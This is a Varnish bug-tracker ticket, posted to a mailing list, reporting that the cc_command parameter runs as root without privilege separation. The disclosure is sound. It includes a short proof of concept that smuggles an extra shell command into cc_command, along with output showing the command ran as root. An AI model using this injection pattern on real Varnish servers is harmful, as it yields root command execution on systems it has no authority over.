[Varnish] #1153: No privilege seperation for cc-command
Varnish
varnish-bugs at varnish-cache.org
Tue Jun 12 10:09:58 CEST 2012
#1153: No privilege seperation for cc-command
----------------------+-----------------------------------------------------
Reporter: kristian | Owner:
Type: defect | Status: new
Priority: normal | Milestone:
Component: varnishd | Version: 3.0.2
Severity: normal | Keywords:
----------------------+-----------------------------------------------------
In short:
{{{
param.set cc_command "id >> /tmp/bad_guy_was_here; exec gcc -std=gnu99 -g
-O2 -pthread -fpic -shared -Wl,-x -o %o %s "
}}}
lead to:
{{{
root at vac-agent:/etc# cat /tmp/bad_guy_was_here
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
}}}
The issue being that it's run as root, not that it works.
Not confirmed on master yet.
--
Ticket URL: <https://www.varnish-cache.org/trac/ticket/1153>
Varnish <https://varnish-cache.org/>
The Varnish HTTP Accelerator
More information about the varnish-bugs
mailing list